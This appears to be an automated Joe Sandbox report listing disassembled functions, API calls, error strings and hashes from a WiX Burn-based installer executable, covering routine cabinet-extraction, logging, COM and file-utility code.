                                                                                                                                                          • Opcode ID: e5847f565544294cb98ce5383b1033197f19d05fdf1fbbac234d4fdb802a836c
                                                                                                                                                          • Instruction ID: f9bbe940fbaf4b834c92c0f85ae8f2c111f1bfa16786d21b18bf66311417cc1a
                                                                                                                                                          • Opcode Fuzzy Hash: e5847f565544294cb98ce5383b1033197f19d05fdf1fbbac234d4fdb802a836c
                                                                                                                                                          • Instruction Fuzzy Hash: CA312672A8573637E62152644C46F27695C9B08BA4F125277BE88BB3C1E6ACCC1043FD
                                                                                                                                                          Function 00439110 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 121fileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 955 439110-439149 CompareStringA 956 43914f-43916e GetCurrentProcess * 2 DuplicateHandle 955->956 957 4391fc-43921a CreateFileA 955->957 958 439170-43917a GetLastError 956->958 959 4391bf-4391d5 call 438f71 956->959 960 43926c-439271 957->960 961 43921c-439226 GetLastError 957->961 962 439187 958->962 963 43917c-439185 958->963 959->960 976 4391db-4391fa call 4012a1 959->976 967 439273 960->967 968 439276-43927c 960->968 964 439233 961->964 965 439228-439231 961->965 969 439189 962->969 970 43918e-4391ba call 40129e call 4012a1 962->970 963->962 971 439235 964->971 972 43923a-439266 call 40129e call 4012a1 964->972 965->964 967->968 969->970 985 439269 970->985 971->972 972->985 976->960 985->960
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringA.KERNEL32(00000000,00000000,<the>.cab,?,?), ref: 00439140
                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 00439156
                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0043915F
                                                                                                                                                          • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00439166
                                                                                                                                                          • GetLastError.KERNEL32(?,?), ref: 00439170
                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0043920F
                                                                                                                                                          • GetLastError.KERNEL32(?,?), ref: 0043921C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                          • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$d:\a\wix\wix\src\burn\engine\cabextract.cpp
                                                                                                                                                          • API String ID: 3030546534-2502751654
                                                                                                                                                          • Opcode ID: 880e26c08bf8a9d42fb3ffe6e035005de115032be8b6c904b1191fc6b5536e7e
                                                                                                                                                          • Instruction ID: f53db32e98ed9c94adb87b9b80c3dd83385aff2b68d2b1ae98082064c1b9b350
                                                                                                                                                          • Opcode Fuzzy Hash: 880e26c08bf8a9d42fb3ffe6e035005de115032be8b6c904b1191fc6b5536e7e
                                                                                                                                                          • Instruction Fuzzy Hash: BD312832E45220B7EB216B558C49F5B3E29DF09B70F5101A6FE04BB2D1D6B88C4087E8
                                                                                                                                                          Function 0046D997 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 112COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 986 46d997-46d9bc call 4018a4 989 46d9be-46d9c3 986->989 990 46d9c8-46d9ca 986->990 991 46dab5-46dab9 989->991 992 46d9cc-46d9d6 990->992 993 46d9ed-46d9ff GetProcAddress 990->993 994 46dac4-46dac8 991->994 995 46dabb-46dabe CoTaskMemFree 991->995 996 46d9db-46d9e8 call 4012a1 992->996 997 46da33-46da48 993->997 998 46da01-46da2e call 40129e call 4012a1 993->998 999 46dad3-46dad8 994->999 1000 46daca-46dacd FreeLibrary 994->1000 995->994 996->991 1007 46da4a-46da4e 997->1007 998->991 1000->999 1009 46da64-46da75 call 403958 1007->1009 1010 46da50-46da5f 1007->1010 1013 46da77-46da89 1009->1013 1014 46da8b-46da95 call 405cbf 1009->1014 1010->996 1015 46daa8-46dab2 call 4012a1 1013->1015 1014->991 1019 46da97-46daa3 1014->1019 1015->991 1019->1015
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004018A4: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
                                                                                                                                                            • Part of subcall function 004018A4: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,00000000,004080B0,00000000,?,?,?,0046D7F7,00000000,?,004087CC,00000000), ref: 0046DABE
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,00000000,004080B0,00000000,?,?,?,0046D7F7,00000000,?,004087CC), ref: 0046DACD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeLibrary$ErrorLastLoadTask
                                                                                                                                                          • String ID: Failed to backslash terminate shell folder path: %ls$Failed to copy shell folder path: %ls$Failed to find SHGetKnownFolderPath entry point.$Failed to get known folder path.$Failed to load shell32.dll.$SHGetKnownFolderPath$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\shelutil.cpp$shell32.dll
                                                                                                                                                          • API String ID: 3444712580-3199561941
                                                                                                                                                          • Opcode ID: 888c95eb1214062b2741fd5c64874dc60f1cf158166d232b36878794219908a8
                                                                                                                                                          • Instruction ID: 8f359f26ba2c67e502fa53ade32e6a188a161d56e6473b1c779abd5ce8af7968
                                                                                                                                                          • Opcode Fuzzy Hash: 888c95eb1214062b2741fd5c64874dc60f1cf158166d232b36878794219908a8
                                                                                                                                                          • Instruction Fuzzy Hash: 2531E8B1F88224B7DB216695CC0AFAF7D68DF51B20F55016BF9047A2D0F2BC4D40969A
                                                                                                                                                          Function 00419E57 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 62COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1021 419e57-419e6d call 466096 1023 419e72-419e74 1021->1023 1024 419ef2-419ef3 1023->1024 1025 419e76-419e87 OpenEventLogW 1023->1025 1026 419ed4-419eeb ReportEventW CloseEventLog 1025->1026 1027 419e89-419e93 GetLastError 1025->1027 1030 419ef1 1026->1030 1028 419ea0 1027->1028 1029 419e95-419e9e 1027->1029 1031 419ea2 1028->1031 1032 419ea7-419ed2 call 40129e call 4012a1 1028->1032 1029->1028 1030->1024 1031->1032 1032->1030
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00466096: EnterCriticalSection.KERNEL32(004B2588,00000000,00000000,00000001,0000000C,0000000C,?,00419D2F,00000000,00000001,00481EB0,?,00000000,00000000,0000000C,00000000), ref: 004660AB
                                                                                                                                                            • Part of subcall function 00466096: LeaveCriticalSection.KERNEL32(004B2588,?,00419D2F,00000000,00000001,00481EB0,?,00000000,00000000,0000000C,00000000,00000001,00000000,00000000,00000000,00000008), ref: 004662AD
                                                                                                                                                          • OpenEventLogW.ADVAPI32(00000000,Application), ref: 00419E7D
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 00419E89
                                                                                                                                                          • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,00481D44,00000000), ref: 00419EE4
                                                                                                                                                          • CloseEventLog.ADVAPI32(00000000), ref: 00419EEB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                                                          • String ID: Application$Failed to open Application event log$Setup$_Failed$d:\a\wix\wix\src\burn\engine\logging.cpp$log
                                                                                                                                                          • API String ID: 1844635321-3478071590
                                                                                                                                                          • Opcode ID: b24dd954bf40572fa6c77ff353cd82409e86e247637cf574ef66685bd4210c88
                                                                                                                                                          • Instruction ID: 25602d8d37ff3994c3581dbc36eede86ea2f9b62e1512641e70d333f68b1b7db
                                                                                                                                                          • Opcode Fuzzy Hash: b24dd954bf40572fa6c77ff353cd82409e86e247637cf574ef66685bd4210c88
                                                                                                                                                          • Instruction Fuzzy Hash: 5801B132A802613AA32162265C49FBF186CDBC2F65B51012BFE04F61D1D64C4C4282FD
                                                                                                                                                          Function 0046B53B Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 51COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 0046B54B
                                                                                                                                                          • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,004B2770,?,00000000,0040941E,?,?,?,?,?,?), ref: 0046B59A
                                                                                                                                                          • CLSIDFromProgID.OLE32(MSXML.DOMDocument,004B2770,?,?,?,?,?,?), ref: 0046B5AA
                                                                                                                                                          Strings
                                                                                                                                                          • failed to get CLSID for XML DOM, xrefs: 0046B5B6
                                                                                                                                                          • p'K, xrefs: 0046B58F
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0046B56B
                                                                                                                                                          • Msxml2.DOMDocument, xrefs: 0046B595
                                                                                                                                                          • MSXML.DOMDocument, xrefs: 0046B5A5
                                                                                                                                                          • failed to initialize COM, xrefs: 0046B55F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FromProg$Initialize
                                                                                                                                                          • String ID: MSXML.DOMDocument$Msxml2.DOMDocument$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed to get CLSID for XML DOM$failed to initialize COM$p'K
                                                                                                                                                          • API String ID: 4047641309-1891771615
                                                                                                                                                          • Opcode ID: 070bdd681c39948e8ba65f255dbd5541c684a9910f97b0bf3af22f934e23c017
                                                                                                                                                          • Instruction ID: d5e8f0636564a9fbbd5183b2aa3e290f30986c28cd0e782d391055c3d4ed0cf7
                                                                                                                                                          • Opcode Fuzzy Hash: 070bdd681c39948e8ba65f255dbd5541c684a9910f97b0bf3af22f934e23c017
                                                                                                                                                          • Instruction Fuzzy Hash: B101A735B813307BD32216565C0AB932A84DB61BA5F25052BFD4AFA2D0FBDC48C185DE
                                                                                                                                                          Function 00439EB4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 94threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004016CA: WaitForMultipleObjects.KERNEL32(?,?,000000FF,00000000,00000000,?,?,00439EE2,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 004016DE
                                                                                                                                                          • GetExitCodeThread.KERNELBASE(004777D8,?,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 00439F24
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00439F32
                                                                                                                                                          • ResetEvent.KERNEL32(004777B0,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 00439F6F
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00439F79
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                          • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$d:\a\wix\wix\src\burn\engine\cabextract.cpp
                                                                                                                                                          • API String ID: 2979751695-1452834964
                                                                                                                                                          • Opcode ID: e874f0e8548b149026500272a360ad1abc8949ffd6ad981d57e0178fdc3723b7
                                                                                                                                                          • Instruction ID: 9c59b011f51dc673cda1be7f211cc67538aff543692fbbd8764081582b806fa8
                                                                                                                                                          • Opcode Fuzzy Hash: e874f0e8548b149026500272a360ad1abc8949ffd6ad981d57e0178fdc3723b7
                                                                                                                                                          • Instruction Fuzzy Hash: BD314771A04215BBDB10DF658D05FAFBAECAB44710F1041BBF509F6290E6B8DD019B58
                                                                                                                                                          Function 00408283 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 92COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00408804,00000000,00000000,?,?,?,?,0040930B,?,?,00000000,?,?,00000003,00000000,004080B0), ref: 004082B3
                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00408798,?,?,?,0040930B,?,?,00000000,?,?,00000003,00000000,004080B0,00000000), ref: 004082C0
                                                                                                                                                          • InitializeCriticalSection.KERNEL32(004081A4,?,?,?,0040930B,?,?,00000000,?,?,00000003,00000000,004080B0,00000000), ref: 004082D7
                                                                                                                                                          • GetCurrentProcess.KERNEL32(0040885C,004087E8,004087CC,?,?,?,0040930B,?,?,00000000,?,?,00000003,00000000,004080B0,00000000), ref: 004082FC
                                                                                                                                                            • Part of subcall function 0046674A: OpenProcessToken.ADVAPI32(004080B0,00000008,00000000,004087CC,004087E8,00000000,004080B0,00000000,?,?,?,?,?,?), ref: 00466768
                                                                                                                                                            • Part of subcall function 0046674A: GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00466772
                                                                                                                                                            • Part of subcall function 0046674A: CloseHandle.KERNELBASE(00000000), ref: 0046682A
                                                                                                                                                            • Part of subcall function 00423268: CompareStringW.KERNEL32(0000007F,00000001,00000002,000000FF,00486CB8,000000FF,004087CC,004087E8,004080B0,00000000,?,?), ref: 004232CC
                                                                                                                                                            • Part of subcall function 00423268: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,log,000000FF), ref: 004232EF
                                                                                                                                                            • Part of subcall function 00423268: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,xlog,000000FF), ref: 00423312
                                                                                                                                                            • Part of subcall function 00423268: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,00486EA0,000000FF), ref: 00423335
                                                                                                                                                            • Part of subcall function 00423268: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,00486EA4,000000FF), ref: 00423358
                                                                                                                                                            • Part of subcall function 00423268: CompareStringW.KERNEL32(0000007F,00000001,-00000002,000000FF,help,000000FF), ref: 0042337B
                                                                                                                                                          Strings
                                                                                                                                                          • Fatal error while parsing command line., xrefs: 00408328
                                                                                                                                                          • Failed to initialize engine section., xrefs: 00408351
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\engine.cpp, xrefs: 00408390
                                                                                                                                                          • Failed to initialize internal cache functionality., xrefs: 0040837E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString$CriticalInitializeSection$Process$CloseCurrentErrorHandleLastOpenToken
                                                                                                                                                          • String ID: Failed to initialize engine section.$Failed to initialize internal cache functionality.$Fatal error while parsing command line.$d:\a\wix\wix\src\burn\engine\engine.cpp
                                                                                                                                                          • API String ID: 268551788-802451582
                                                                                                                                                          • Opcode ID: b70d1163e0850b519a33fec7cc106fcf5c68e651c9aad3c5785423cded4f40ff
                                                                                                                                                          • Instruction ID: 371c593e34d63dd5b413f7c6df2c014ff19fca8bb5ac72b95103c9ce247f2655
                                                                                                                                                          • Opcode Fuzzy Hash: b70d1163e0850b519a33fec7cc106fcf5c68e651c9aad3c5785423cded4f40ff
                                                                                                                                                          • Instruction Fuzzy Hash: 6D318472944215BBCB11DFA4CC85FDA3B6CEB04710F54417AFE0DEB185EA78A6448BB4
                                                                                                                                                          Function 0046674A Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • OpenProcessToken.ADVAPI32(004080B0,00000008,00000000,004087CC,004087E8,00000000,004080B0,00000000,?,?,?,?,?,?), ref: 00466768
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00466772
                                                                                                                                                          • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),00000004,00000004,?,?,?,?,?,?,?), ref: 004667BB
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 004667D4
                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 0046682A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                          • String ID: Failed to get elevation token from process.$Failed to open process token.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                          • API String ID: 4040495316-1361431665
                                                                                                                                                          • Opcode ID: 22247918d0beedd1c79e0552544f23a93f3711712c8440a749aa487ebdb1e7d4
                                                                                                                                                          • Instruction ID: 9d703d655154a1856f3ff9ce90b9f696ef254a014e140dab863fb6466555baf5
                                                                                                                                                          • Opcode Fuzzy Hash: 22247918d0beedd1c79e0552544f23a93f3711712c8440a749aa487ebdb1e7d4
                                                                                                                                                          • Instruction Fuzzy Hash: E421E936E41224B7D7219B558C05B9FBA68EF10725F12406BFE08BB2D0E6788D00D6D9
                                                                                                                                                          Function 0040588E Relevance: 13.6, APIs: 5, Strings: 4, Instructions: 135memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,00000001,00000000), ref: 004058B7
                                                                                                                                                          • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000001,00000000), ref: 00405902
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000), ref: 00405946
                                                                                                                                                          • GetLastError.KERNEL32(?,00478AEC,?,00000000,?,00000000,00000000,00000000), ref: 004059A4
                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 004059F6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                          • String ID: d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\fileutil.cpp$failed to allocate version info for file: %ls$failed to get version info for file: %ls$failed to get version value for file: %ls
                                                                                                                                                          • API String ID: 1145190524-2366914229
                                                                                                                                                          • Opcode ID: 6befc36a0f6a07c1b4dccf583a37e8e22728198433d23f7540b5f6345e3c3fb3
                                                                                                                                                          • Instruction ID: 4cf5761365e7817005ee946c716856097d040c14643abe45a0da6aa0e1a9449b
                                                                                                                                                          • Opcode Fuzzy Hash: 6befc36a0f6a07c1b4dccf583a37e8e22728198433d23f7540b5f6345e3c3fb3
                                                                                                                                                          • Instruction Fuzzy Hash: 15413B72A40325B7E321A6558C05FAF7A68DF05774F11817BFE08B72C1DB788C008AE9
                                                                                                                                                          Function 0040241C Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 103COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateDirectoryW.KERNELBASE(00000000,0040951C,?,00000000,?,0041DD2E,00000000,00000000,?,version.dll,00000000,0040951C,00000000,0040960C,?,00000001), ref: 0040242A
                                                                                                                                                          • GetLastError.KERNEL32(?,0041DD2E,00000000,00000000,?,version.dll,00000000,0040951C,00000000,0040960C,?,00000001), ref: 00402438
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                          • String ID: cannot find parent path$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dirutil.cpp$failed to create path: %ls
                                                                                                                                                          • API String ID: 1375471231-281134482
                                                                                                                                                          • Opcode ID: 678f7e05db71df02d347992ae81a9d48ecdf6d4daa0fa0d390600d566aaad62c
                                                                                                                                                          • Instruction ID: 6752c2e759bdc844ee7f90c3fec559d13cbdb074147013c08ddcab0a41e473f8
                                                                                                                                                          • Opcode Fuzzy Hash: 678f7e05db71df02d347992ae81a9d48ecdf6d4daa0fa0d390600d566aaad62c
                                                                                                                                                          • Instruction Fuzzy Hash: A9214536A84220B7EB322A514E49F3B6A54AB91B60F504037FD09FA2D1D6FC8C4252DE
                                                                                                                                                          Function 0040192E Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 89COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
